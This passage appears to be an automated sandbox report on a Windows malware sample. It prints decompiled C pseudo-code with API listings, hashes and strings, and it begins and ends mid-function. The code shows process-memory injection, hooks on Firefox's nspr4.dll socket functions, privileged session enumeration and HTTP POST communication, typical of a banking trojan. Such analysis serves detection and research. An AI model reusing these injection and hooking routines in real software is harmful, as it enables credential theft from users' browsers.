    					E00406F38( &_v1044,  &_v1044, 0, 0x308);
    					_v1576 = 0;
    					_t80 = E00412FEE();
    					__eflags = _t80;
    					if(_t80 != 0) {
    						do {
    							__eflags =  *_t131;
    							_v1613 = 1;
    							if( *_t131 != 0) {
    								L24:
    								_t83 = E004168C6();
    								_t138 = _t83;
    								__eflags = _t83;
    								if(__eflags == 0) {
    									goto L29;
    								} else {
    									_v1612 = E0040C9F1(0, _t129, __eflags, _t138, 0x4e23, 0x10000000);
    									E00406E85(_t138);
    									__eflags = _v1616;
    									if(_v1616 == 0) {
    										_t131 = _a4;
    										goto L33;
    									} else {
    										_v1580 = _v1580 & 0;
    										_t108 = E0040E2A5(_t128, _t129,  &_v1580, 1);
    										_t131 = _a4;
    										__eflags = _t108;
    										if(_t108 == 0) {
    											L33:
    											_t125 = _v1613;
    										} else {
    											_t131[8] = _t131[8] | 0xffffffff;
    											_t110 = E0040EAA2( &_v1600);
    											__eflags = _t110;
    											_t125 = (0 | _t110 != 0x00000000) - 0x00000001 & 0x00000002;
    											E0040CE1E( &(_t131[8]));
    											E00406E85(_v1580);
    										}
    									}
    									E00406E85(_v1600);
    									__eflags = _t125 - 2;
    									if(_t125 != 2) {
    										__eflags = _t125;
    										if(_t125 != 0) {
    											goto L29;
    										} else {
    											_t84 = _v1612;
    										}
    									} else {
    										_t84 = _v1608;
    									}
    								}
    							} else {
    								asm("sbb ebx, ebx");
    								E0040E164( !( ~(_v1564 & 0x0000ffff)) &  &_v1564, _t128, 0);
    								_t123 =  &(_t131[0x122]);
    								_t89 = GetFileAttributesW( &_v1568);
    								__eflags = _t89 - 0xffffffff;
    								if(_t89 == 0xffffffff) {
    									_t89 = GetFileAttributesW(0x423348);
    									__eflags = _t89 - 0xffffffff;
    									if(_t89 == 0xffffffff) {
    										goto L29;
    									} else {
    										_t128 = 0x423348;
    										goto L14;
    									}
    								} else {
    									_t128 =  &_v1564;
    									L14:
    									_t129 = _t123;
    									E00407226(_t89 | 0xffffffff, _t128, _t129);
    									_t140 = CreateFileW(_t123, 0x80000000, 7, 0, 3, 0, 0);
    									__eflags = _t140 - 0xffffffff;
    									if(_t140 == 0xffffffff) {
    										L28:
    										E0040C1E0(_t123);
    										goto L29;
    									} else {
    										_v1576 = E0040C1B9(_t128, _t140);
    										_t134 = _t129;
    										CloseHandle(_t140);
    										__eflags = _v1576 - 0xffffffff;
    										if(_v1576 != 0xffffffff) {
    											L17:
    											__eflags = _t134;
    											if(__eflags > 0) {
    												goto L28;
    											} else {
    												if(__eflags < 0) {
    													L20:
    													__eflags = lstrcmpiW(_t123,  &_v1564);
    													if(__eflags == 0) {
    														goto L24;
    													} else {
    														_t141 = E00412EC8(_t128, __eflags, 0x8793aef2, 2);
    														__eflags = _t141;
    														if(_t141 == 0) {
    															L29:
    															_t131 = _a4;
    															_t84 = 0x7530;
    														} else {
    															_t101 = MoveFileExW(_t123,  &_v1564, 0xb);
    															__eflags = _t101;
    															if(_t101 == 0) {
    																goto L29;
    															} else {
    																E0040A658(_t141);
    																__eflags = _t101 | 0xffffffff;
    																_t128 =  &_v1568;
    																_t129 = _t123;
    																E00407226(_t101 | 0xffffffff,  &_v1568, _t123);
    																goto L24;
    															}
    														}
    													}
    												} else {
    													__eflags = _v1572 - 0xffffffff;
    													if(_v1572 > 0xffffffff) {
    														goto L28;
    													} else {
    														goto L20;
    													}
    												}
    											}
    										} else {
    											__eflags = _t134;
    											if(_t134 == 0) {
    												goto L28;
    											} else {
    												goto L17;
    											}
    										}
    									}
    								}
    							}
    							_t85 = WaitForSingleObject( *0x423e2c, _t84);
    							__eflags = _t85 - 0x102;
    						} while (_t85 == 0x102);
    					}
    					E0040A658(_v1604);
    					_t136 = 0;
    				} else {
    					_t136 = 1;
    				}
    				E00406E85(_t131);
    				return _t136;
    			}

    APIs
      • Part of subcall function 00412EC8: CreateMutexW.KERNEL32(004239A0,00000000,?,?,?,?,?), ref: 00412EE9
    • GetFileAttributesW.KERNEL32(?,00000000,?,00000000,00000308,?,?,00000102), ref: 0040E7CD
    • CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000000,00000000), ref: 0040E806
    • CloseHandle.KERNEL32(00000000,00000000), ref: 0040E824
    • lstrcmpiW.KERNEL32(?,?), ref: 0040E854
      • Part of subcall function 00406E85: HeapFree.KERNEL32(00000000,00000000,0040867C,00000000,?,?,?,004127CC,00000000,00412CA6), ref: 00406E98
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: CreateFile$AttributesCloseFreeHandleHeapMutexlstrcmpi
    • String ID: H3B
    • API String ID: 503543330-3983622374
    • Opcode ID: 5b3f71658fc33d6b80989457b52826eca6cb03b3688a06c70f3c63e55c87139d
    • Instruction ID: a361a4aef9e74396fdbbde4ac5dd9b8492d2f489b5f79fe3a7d59a6b340616fc
    • Opcode Fuzzy Hash: 5b3f71658fc33d6b80989457b52826eca6cb03b3688a06c70f3c63e55c87139d
    • Instruction Fuzzy Hash: D671B0715083419BC320EF36C881A6BB7E8AB85324F140E3EF994B72D1D778D925879A
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 93%
    			E0041D3DD(intOrPtr __ecx, void* __edx, void* __eflags) {
    				intOrPtr _v8;
    				intOrPtr _v12;
    				char _v16;
    				void* _v20;
    				void* _v24;
    				intOrPtr _v28;
    				char _v92;
    				void* __ebx;
    				void* __edi;
    				intOrPtr _t22;
    				void* _t25;
    				long _t27;
    				void* _t28;
    				long _t29;
    				void* _t33;
    				void* _t39;
    				void* _t41;
    				void* _t44;
    				long _t49;
    				void* _t50;
    				void* _t57;
    				void* _t62;
    				void* _t69;
    				void* _t73;
    				WCHAR* _t77;
    				void* _t78;
    				void* _t80;
    				void* _t82;
    
    				_t73 = __edx;
    				_t70 = __ecx;
    				_t22 = E00412EC8(__ecx, __eflags, 0x743c1521, 2);
    				_v28 = _t22;
    				if(_t22 != 0) {
    					SetThreadPriority(GetCurrentThread(), 0xfffffff1);
    					_t25 = E00412FEE();
    					__eflags = _t25;
    					if(_t25 == 0) {
    						L24:
    						E0040A658(_v28);
    						__eflags = 0;
    						return 0;
    					}
    					_t27 = WaitForSingleObject( *0x423e2c, 0xea60);
    					__eflags = _t27 - 0x102;
    					if(_t27 != 0x102) {
    						goto L24;
    					}
    					do {
    						_t28 = E00416730(_t70);
    						_v24 = _t28;
    						__eflags = _t28;
    						if(__eflags == 0) {
    							goto L22;
    						}
    						_t80 = E0040C9F1( &_v16, _t73, __eflags, _t28, 2, 0x20000000);
    						_v20 = _t80;
    						__eflags = _t80;
    						if(__eflags == 0) {
    							L21:
    							E00406E85(_v20);
    							E00406E85(_v24);
    							goto L22;
    						}
    						_t70 = _v16;
    						_t33 = E0041CE72(_v16, __eflags, _t80);
    						__eflags = _t33;
    						if(_t33 == 0) {
    							goto L21;
    						} else {
    							goto L8;
    						}
    						do {
    							L8:
    							_v8 = E00407D55(_t80, 1);
    							_v12 = E00407D55(_t80, 2);
    							_t39 = E00408234(_t80, E004079C2(_t80));
    							_t72 = _v8;
    							_t41 = E00408234(_t72, E004079C2(_v8));
    							_t70 = _v12;
    							_push(E00408234(_t70, E004079C2(_v12)));
    							_push(_t41);
    							_push(_t39);
    							_push(L"Global\\%08X%08X%08X");
    							_t73 = 0x20;
    							_t77 =  &_v92;
    							_t44 = E00407B78(_t43, _t73, _t77);
    							_t82 = _t82 + 0x10;
    							__eflags = _t44 - 0x1f;
    							if(_t44 != 0x1f) {
    								goto L20;
    							}
    							_t69 = CreateMutexW(0x4239a0, 1, _t77);
    							__eflags = _t69;
    							if(_t69 == 0) {
    								goto L20;
    							}
    							_t49 = GetLastError();
    							__eflags = _t49 - 0xb7;
    							if(_t49 == 0xb7) {
    								CloseHandle(_t69);
    								_t69 = 0;
    								__eflags = 0;
    							}
    							__eflags = _t69;
    							if(_t69 != 0) {
    								_t50 = 0x10;
    								_t78 = E00406E55(_t50);
    								__eflags = _t78;
    								if(_t78 == 0) {
    									L19:
    									E0040A658(_t69);
    									goto L20;
    								}
    								 *_t78 = E004072E3(_t51 | 0xffffffff, _t80);
    								 *(_t78 + 4) = E004072E3(_t53 | 0xffffffff, _v8);
    								_t57 = E004072E3(_t55 | 0xffffffff, _v12);
    								__eflags =  *_t78;
    								 *(_t78 + 8) = _t57;
    								 *(_t78 + 0xc) = _t69;
    								if( *_t78 == 0) {
    									L18:
    									E00406E85( *_t78);
    									E00406E85( *(_t78 + 4));
    									E00406E85( *(_t78 + 8));
    									E00406E85(_t78);
    									goto L19;
    								}
    								__eflags =  *(_t78 + 4);
    								if( *(_t78 + 4) == 0) {
    									goto L18;
    								}
    								__eflags = _t57;
    								if(_t57 == 0) {
    									goto L18;
    								}
    								_t62 = E004088BA(0x80000, E0041D132, _t78);
    								__eflags = _t62;
    								if(_t62 != 0) {
    									goto L20;
    								}
    								goto L18;
    							}
    							L20:
    							_t80 = E00407D55(_t80, 3);
    							__eflags = _t80;
    						} while (_t80 != 0);
    						goto L21;
    						L22:
    						_t29 = WaitForSingleObject( *0x423e2c, 0xea60);
    						__eflags = _t29 - 0x102;
    					} while (_t29 == 0x102);
    					goto L24;
    				}
    				return _t22 + 1;
    			}

    APIs
      • Part of subcall function 00412EC8: CreateMutexW.KERNEL32(004239A0,00000000,?,?,?,?,?), ref: 00412EE9
    • GetCurrentThread.KERNEL32 ref: 0041D3FE
    • SetThreadPriority.KERNEL32(00000000), ref: 0041D405
    • WaitForSingleObject.KERNEL32(0000EA60), ref: 0041D423
    • CreateMutexW.KERNEL32(004239A0,00000001,?,20000000), ref: 0041D4E6
    • GetLastError.KERNEL32 ref: 0041D4F6
    • CloseHandle.KERNEL32(00000000), ref: 0041D504
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: CreateMutexThread$CloseCurrentErrorHandleLastObjectPrioritySingleWait
    • String ID: Global\%08X%08X%08X
    • API String ID: 3448221409-3239447729
    • Opcode ID: df2755747392a18fd5a753d779dfd56c472087f9862ccf36cbd5bb90f9227ff7
    • Instruction ID: 7891e28458360a2688fc13f945e8afe01b6e058d4d378cb6e37908dbf5e1b94c
    • Opcode Fuzzy Hash: df2755747392a18fd5a753d779dfd56c472087f9862ccf36cbd5bb90f9227ff7
    • Instruction Fuzzy Hash: 5341C2B0E007017BDB117BB1CD46AAF7666AF40318F10063AF815B62D2DF7C9D9086AE
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 62%
    			E00415ABB(void* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
    				struct HINSTANCE__* _v8;
    				char _v12;
    				char _v16;
    				_Unknown_base(*)()* _v20;
    				intOrPtr _v24;
    				char _v40;
    				char _v60;
    				char _v84;
    				char _v112;
    				void* __edi;
    				void* __esi;
    				struct HINSTANCE__* _t30;
    				_Unknown_base(*)()* _t42;
    				intOrPtr _t44;
    				intOrPtr _t50;
    				intOrPtr* _t55;
    				void* _t57;
    				void* _t58;
    				intOrPtr* _t59;
    				CHAR* _t61;
    				CHAR* _t62;
    				CHAR* _t63;
    				_Unknown_base(*)()* _t64;
    				WCHAR* _t66;
    				void* _t68;
    
    				_t58 = __ecx;
    				_t66 =  &_v112;
    				E00405B00(0xdd, _t66);
    				_t30 = LoadLibraryW(_t66);
    				_v8 = _t30;
    				if(_t30 == 0) {
    					return _t30;
    				}
    				_t61 =  &_v84;
    				E00405ACA(0xde, _t61);
    				_t55 = GetProcAddress(_v8, _t61);
    				_t62 =  &_v40;
    				E00405ACA(0xdf, _t62);
    				_v20 = GetProcAddress(_v8, _t62);
    				_t63 =  &_v60;
    				E00405ACA(0xe0, _t63);
    				_t42 = GetProcAddress(_v8, _t63);
    				_t68 = 0;
    				_t64 = _t42;
    				if(_t55 == 0 || _v20 == 0 || _t64 == 0) {
    					L14:
    					return FreeLibrary(_v8);
    				} else {
    					_t44 = E00408551(L"SeTcbPrivilege");
    					__imp__WTSGetActiveConsoleSessionId();
    					_v24 = _t44;
    					if(_t44 != 0xffffffff) {
    						E00415A4A(_t58, 0, _t64, _t44, _a4, _a8);
    					}
    					_push( &_v12);
    					_push( &_v16);
    					_push(1);
    					_push(_t68);
    					_push(_t68);
    					if( *_t55() == 0) {
    						goto L14;
    					} else {
    						_t57 = 0;
    						if(_v12 <= _t68) {
    							L13:
    							_v20(_v16);
    							goto L14;
    						} else {
    							goto L8;
    						}
    						do {
    							L8:
    							_t59 = _t68 + _v16;
    							_t50 =  *((intOrPtr*)(_t59 + 8));
    							if(_t50 == 0 || _t50 == 4) {
    								_t51 =  *_t59;
    								if( *_t59 != _v24) {
    									E00415A4A(_t59, _t68, _t64, _t51, _a4, _a8);
    								}
    							}
    							_t57 = _t57 + 1;
    							_t68 = _t68 + 0xc;
    						} while (_t57 < _v12);
    						goto L13;
    					}
    				}
    			}

    APIs
    • LoadLibraryW.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,00416451,?,?), ref: 00415AD2
    • GetProcAddress.KERNEL32(?,?), ref: 00415AFE
    • GetProcAddress.KERNEL32(?,?), ref: 00415B15
    • GetProcAddress.KERNEL32(?,?), ref: 00415B2D
    • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00416451,?,?,00000000), ref: 00415BB6
      • Part of subcall function 00408551: GetCurrentThread.KERNEL32 ref: 00408561
      • Part of subcall function 00408551: OpenThreadToken.ADVAPI32(00000000,?,?,?,?,00415B4A,SeTcbPrivilege), ref: 00408568
      • Part of subcall function 00408551: OpenProcessToken.ADVAPI32(000000FF,00000020,J[A,?,?,?,?,00415B4A,SeTcbPrivilege), ref: 0040857A
    • WTSGetActiveConsoleSessionId.KERNEL32(SeTcbPrivilege,?,?,?,?,?,?,?,?,?,?,?,00416451,?,?,00000000), ref: 00415B4A
      • Part of subcall function 00415A4A: EqualSid.ADVAPI32(00000000,00000000,?,00000000,?,00415BA4,00000000,?,?,?), ref: 00415A6F
      • Part of subcall function 00415A4A: CloseHandle.KERNEL32(?,?,00000000,?,00415BA4,00000000,?,?,?), ref: 00415AB0
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: AddressProc$LibraryOpenThreadToken$ActiveCloseConsoleCurrentEqualFreeHandleLoadProcessSession
    • String ID: .exe$SeTcbPrivilege
    • API String ID: 1107370034-552748125
    • Opcode ID: 41df2f19b03972d1932bde7e6e015b41570e1fa0dd650c3e7feb960aac92c30b
    • Instruction ID: 2ad6ccc125f3d13c226d6d86fc236b62286bf1622260f7b1dd5ebcbad7026212
    • Opcode Fuzzy Hash: 41df2f19b03972d1932bde7e6e015b41570e1fa0dd650c3e7feb960aac92c30b
    • Instruction Fuzzy Hash: D9315835A00618EFCF11ABE5CD849EFBB79EF84304F144566F801F6250C678AE819AA8
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0041295C(void* __ecx, void* __edx, void* __eflags) {
    				long _v8;
    				signed int _v12;
    				void _v532;
    				void* __edi;
    				unsigned int _t22;
    				void* _t30;
    				void* _t39;
    				void* _t41;
    				WCHAR* _t42;
    				void* _t43;
    				void* _t46;
    
    				_t41 = __edx;
    				_t39 = __ecx;
    				InitializeCriticalSection(0x4223b8);
    				 *0x4223ac = 0;
    				 *0x4223b4 = 0;
    				 *0x4223b0 = 0;
    				 *0x4223a8 = 0;
    				 *0x424000 = 0;
    				 *0x423ff8 = 0;
    				 *0x423ffc = 0;
    				InitializeCriticalSection(0x423fe0);
    				_t42 =  &_v532;
    				E004131E9(_t39, _t42, 0);
    				_v12 = _v12 | 0xffffffff;
    				_v8 = 0x1fe;
    				_t43 = CreateFileW(_t42, 0x80000000, 1, 0, 3, 0, 0);
    				if(_t43 != 0xffffffff) {
    					if(ReadFile(_t43,  &_v532, _v8,  &_v8, 0) != 0) {
    						_v12 = _v8;
    					}
    					CloseHandle(_t43);
    				}
    				_t22 = _v12;
    				if(_t22 == 0xffffffff || (_t22 & 0x00000001) != 0) {
    					_t22 = 0;
    				}
    				 *((short*)(_t46 + (_t22 >> 1) * 2 - 0x210)) = 0;
    				E0041BFDD( &_v532);
    				E0041475F( &_v532);
    				 *0x423f5c = 0;
    				 *0x423fdc = 0;
    				InitializeCriticalSection(0x423fc4);
    				E0040D9C1(_t41);
    				if(GetModuleHandleW(L"nspr4.dll") == 0) {
    					_t30 = 0;
    				} else {
    					_t30 = E00404F4F(0, _t41, _t29);
    				}
    				if(_t30 != 0) {
    					 *0x423774 =  *0x423774 | 0x00000001;
    				}
    				E00404D18();
    				return 1;
    			}

    APIs
    • InitializeCriticalSection.KERNEL32(004223B8,00000000,74B04EE0,00000000), ref: 00412973
    • InitializeCriticalSection.KERNEL32(00423FE0), ref: 004129A8
      • Part of subcall function 004131E9: PathRenameExtensionW.SHLWAPI(?,.dat,?,004239C8,00000000,00000032,?,77E49EB0,00000000), ref: 00413262
    • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 004129D0
    • ReadFile.KERNEL32(00000000,?,000001FE,000001FE,00000000), ref: 004129ED
    • CloseHandle.KERNEL32(00000000), ref: 004129FE
    • InitializeCriticalSection.KERNEL32(00423FC4), ref: 00412A45
    • GetModuleHandleW.KERNEL32(nspr4.dll), ref: 00412A51
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: CriticalInitializeSection$FileHandle$CloseCreateExtensionModulePathReadRename
    • String ID: nspr4.dll
    • API String ID: 1155594396-741017701
    • Opcode ID: 9d41ba7e63571c8dcfb6563cc241efb5eb3ff5d57f5484d75c1f37e937bff888
    • Instruction ID: 97f8fcc1ee728c5dac7df4b46860eacb7370b703142412b0d1f081894f045f7a
    • Opcode Fuzzy Hash: 9d41ba7e63571c8dcfb6563cc241efb5eb3ff5d57f5484d75c1f37e937bff888
    • Instruction Fuzzy Hash: A9318470A40208AAC720DF79AE85ADA77B8FF44354F50057FF515E32E0D7B84A828B5C
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 95%
    			E00412F03(void* __ecx, void* __edi, void* __esi, void* __eflags, void* _a4, void _a8) {
    				char _v5;
    				void _v12;
    				void _t26;
    				void _t43;
    				void* _t51;
    				void* _t52;
    
    				_t52 = __esi;
    				_t51 = __edi;
    				_t26 = E0040B7DE( *0x42397c, __edi);
    				_v12 = _t26;
    				if(_t26 != 0) {
    					_v5 = 0;
    					if(DuplicateHandle(0xffffffff, _a4, __edi,  &_a4, 0, 0, 2) == 0) {
    						_v5 = 1;
    					}
    					_a8 = _a8 |  *0x423968 & 0x00000014;
    					_push(_t52);
    					if(WriteProcessMemory(_t51, 0x423968 -  *0x42397c + _v12,  &_a8, 4, 0) == 0) {
    						_v5 = _v5 + 1;
    					}
    					if(WriteProcessMemory(_t51, 0x42397c -  *0x42397c + _v12,  &_v12, 4, 0) == 0) {
    						_v5 = _v5 + 1;
    					}
    					if(E004126D9(0x423e2c, _t51, _v12,  *0x423e2c) == 0) {
    						_v5 = _v5 + 1;
    					}
    					if(E004126D9(0x423e30, _t51, _v12,  *0x423e30) == 0) {
    						_v5 = _v5 + 1;
    					}
    					if(_v5 == 0) {
    						_t43 = _v12;
    					} else {
    						VirtualFreeEx(_t51, _v12, 0, 0x8000);
    						goto L1;
    					}
    				} else {
    					L1:
    					_t43 = 0;
    				}
    				return _t43;
    			}

    APIs
      • Part of subcall function 0040B7DE: IsBadReadPtr.KERNEL32(?,?,00000000,?,00000000,?,00000000,?,74B5F560,00000000), ref: 0040B7FA
    • DuplicateHandle.KERNEL32(000000FF,74B5F560,00000000,74B5F560,00000000,00000000,00000002,00000000,00000000,?,?,?,00405F2E,?,00000000,?), ref: 00412F35
    • WriteProcessMemory.KERNEL32(00000000,74B5F560,?,00000004,00000000,?,?,?,?,00405F2E,?,00000000,?,?,004060BC,?), ref: 00412F6C
    • WriteProcessMemory.KERNEL32(00000000,74B5F560,74B5F560,00000004,00000000,?,?,?,00405F2E,?,00000000,?,?,004060BC,?,?), ref: 00412F8C
    • VirtualFreeEx.KERNEL32(00000000,74B5F560,00000000,00008000,00000000,74B5F560,00000000,74B5F560,?,?,00405F2E,?,00000000,?,?,004060BC), ref: 00412FDB
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: MemoryProcessWrite$DuplicateFreeHandleReadVirtual
    • String ID: ,>B$0>B$h9B$|9B
    • API String ID: 2215616122-850568417
    • Opcode ID: b71ec7abf7b12941cd4bc090b40fff6d20e6c5d36b442db797c3723993204852
    • Instruction ID: cbe87a814bb7ee593a4eecd643eb3e198966d32338d260eb30c917bbb008ebc6
    • Opcode Fuzzy Hash: b71ec7abf7b12941cd4bc090b40fff6d20e6c5d36b442db797c3723993204852
    • Instruction Fuzzy Hash: 7821B6B1604149BBDB019FA4DD41EFE7F78EB19304F404095F601E6150D3B99A97DB28
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 90%
    			E00408B6D(void* _a4, long _a8, void* _a12, long _a16, void _a20) {
    				long _t18;
    				char* _t21;
    				signed int _t29;
    				char* _t30;
    				void* _t32;
    
    				_t29 = _a20 & 0x00000002;
    				_t18 = 0x8404f700;
    				if(_t29 != 0) {
    					_t18 = 0x8444f700;
    				}
    				if((_a20 & 0x00000004) != 0) {
    					_t18 = _t18 | 0x00800000;
    				}
    				_t30 = "POST";
    				if((_a20 & 0x00000001) == 0) {
    					_t30 = "GET";
    				}
    				_t32 = HttpOpenRequestA(_a4, _t30, _a8, "HTTP/1.1", 0, 0x422000, _t18, 0);
    				if(_t32 == 0) {
    					L15:
    					return 0;
    				} else {
    					if(_t29 == 0) {
    						_push(0x13);
    						_t21 = "Connection: close\r\n";
    						_pop(0);
    					} else {
    						_t21 = 0;
    					}
    					if(HttpSendRequestA(_t32, _t21, 0, _a12, _a16) == 0) {
    						L14:
    						InternetCloseHandle(_t32);
    						goto L15;
    					} else {
    						_a20 = _a20 & 0x00000000;
    						_a8 = 4;
    						if(HttpQueryInfoA(_t32, 0x20000013,  &_a20,  &_a8, 0) == 0 || _a20 != 0xc8) {
    							goto L14;
    						} else {
    							return _t32;
    						}
    					}
    				}
    			}

    APIs
    • HttpOpenRequestA.WININET(?,POST,?,HTTP/1.1,00000000,00422000,8404F700,00000000), ref: 00408BB5
    • HttpSendRequestA.WININET(00000000,Connection: close,00000013,?,?), ref: 00408BDC
    • HttpQueryInfoA.WININET(00000000,20000013,00000000,?,00000000), ref: 00408C01
    • InternetCloseHandle.WININET(00000000), ref: 00408C19
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: Http$Request$CloseHandleInfoInternetOpenQuerySend
    • String ID: Connection: close$GET$HTTP/1.1$POST
    • API String ID: 3080274660-1621676011
    • Opcode ID: 2ac2dbd981a47687df86cad1dd4c579d877e7be7e6493cb2d8c37352798f4162
    • Instruction ID: e4681c177468f23ad7595186a72d33fcd041a771e0c44f6a05d870dbf4a182c4
    • Opcode Fuzzy Hash: 2ac2dbd981a47687df86cad1dd4c579d877e7be7e6493cb2d8c37352798f4162
    • Instruction Fuzzy Hash: 801193712452096BEF114E50DD85FAB3AA8DB44354F14803AFF01F62E0DBB8E95087EC
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 83%
    			E00404F4F(void* __ecx, void* __edx, struct HINSTANCE__* __edi) {
    				void* __ebx;
    				_Unknown_base(*)()* _t4;
    				void* _t9;
    				void* _t10;
    				void* _t11;
    				void* _t12;
    
    				_t12 = __edx;
    				_t11 = __ecx;
    				 *0x422360 = GetProcAddress(__edi, "PR_OpenTCPSocket");
    				 *0x422370 = GetProcAddress(__edi, "PR_Close");
    				 *0x422380 = GetProcAddress(__edi, "PR_Read");
    				_t4 = GetProcAddress(__edi, "PR_Write");
    				_push(0x422360);
    				_t9 = 4;
    				 *0x422390 = _t4;
    				_t10 = E00404C87(_t9, _t11, _t12);
    				if(_t10 != 0) {
    					E00414818(__edi,  *0x422368,  *0x422378,  *0x422388,  *0x422398);
    				}
    				return _t10;
    			}

    APIs
    • GetProcAddress.KERNEL32(00000000,PR_OpenTCPSocket), ref: 00404F5D
    • GetProcAddress.KERNEL32(00000000,PR_Close), ref: 00404F6A
    • GetProcAddress.KERNEL32(00000000,PR_Read), ref: 00404F77
    • GetProcAddress.KERNEL32(00000000,PR_Write), ref: 00404F84
      • Part of subcall function 00404C87: VirtualAllocEx.KERNEL32(000000FF,00000000,00000034,00003000,00000040,00000000,77E49EB0,?,?,00404F4D,00422020,00000000,00412A76), ref: 00404CBE
      • Part of subcall function 00414818: InitializeCriticalSection.KERNEL32(00423E40,74B04EE0,00404FBD,00422360), ref: 0041482E
      • Part of subcall function 00414818: GetProcAddress.KERNEL32(00000000,PR_GetNameForIdentity), ref: 0041486A
      • Part of subcall function 00414818: GetProcAddress.KERNEL32(PR_SetError), ref: 0041487C
      • Part of subcall function 00414818: GetProcAddress.KERNEL32(PR_GetError), ref: 0041488E
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: AddressProc$AllocCriticalInitializeSectionVirtual
    • String ID: PR_Close$PR_OpenTCPSocket$PR_Read$PR_Write
    • API String ID: 1833644279-3954199073
    • Opcode ID: be42e31a414a88592202dfd95c9b53a8bbc0c61af8e331d4aa6df0de539697b6
    • Instruction ID: 32d0d329873543ef2d4474a4a6536f49c38d4ac10ab500e981e85ec4bd17e914
    • Opcode Fuzzy Hash: be42e31a414a88592202dfd95c9b53a8bbc0c61af8e331d4aa6df0de539697b6
    • Instruction Fuzzy Hash: 34F03071B813147BCB219B756D06D967FACF796B64398043BB904A71B0C7FE0442DA5C
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 96%
    			E0041B69B(char __eax, void* __ecx, char* _a4, intOrPtr* _a8, signed int* _a12) {
    				char _v540;
    				char _v800;
    				char _v804;
    				char _v860;
    				struct _SYSTEMTIME _v876;
    				char _v900;
    				signed int _v968;
    				signed int _v980;
    				intOrPtr _v984;
    				intOrPtr _v988;
    				char* _v992;
    				char _v996;
    				void* _v1008;
    				struct _SYSTEMTIME _v1028;
    				signed int _v1032;
    				short _v1036;
    				signed short* _v1040;
    				signed int _v1044;
    				intOrPtr* _v1048;
    				signed int _v1052;
    				signed int _v1056;
    				signed int _v1060;
    				signed int _v1064;
    				char _v1068;
    				intOrPtr _v1072;
    				char _v1076;
    				intOrPtr _v1080;
    				intOrPtr _v1084;
    				void* __ebx;
    				void* __edi;
    				void* __esi;
    				intOrPtr _t158;
    				signed int _t159;
    				intOrPtr _t160;
    				signed int _t168;
    				void* _t188;
    				void* _t199;
    				signed int _t211;
    				signed int _t215;
    				signed int _t218;
    				signed char _t222;
    				signed int _t224;
    				void* _t227;
    				void* _t228;
    				signed int _t229;
    				signed int _t230;
    				signed int _t240;
    				void* _t242;
    				signed int _t250;
    				intOrPtr* _t254;
    				signed int _t255;
    				intOrPtr _t258;
    				short* _t261;
    				void* _t280;
    				intOrPtr* _t286;
    				signed int _t291;
    				long _t294;
    				signed short* _t296;
    				signed short* _t298;
    				signed int _t301;
    				intOrPtr* _t303;
    				signed int _t307;
    				void* _t309;
    
    				_t309 = (_t307 & 0xfffffff8) - 0x424;
    				_v1032 = _v1032 & 0x00000000;
    				if(__eax == 0) {
    					L52:
    					asm("sbb eax, eax");
    					return  ~0x00000000;
    				} else {
    					_t286 = __ecx + 0x10;
    					_v1048 = _t286;
    					_v1028.wDayOfWeek = __eax;
    					do {
    						_t258 =  *_t286;
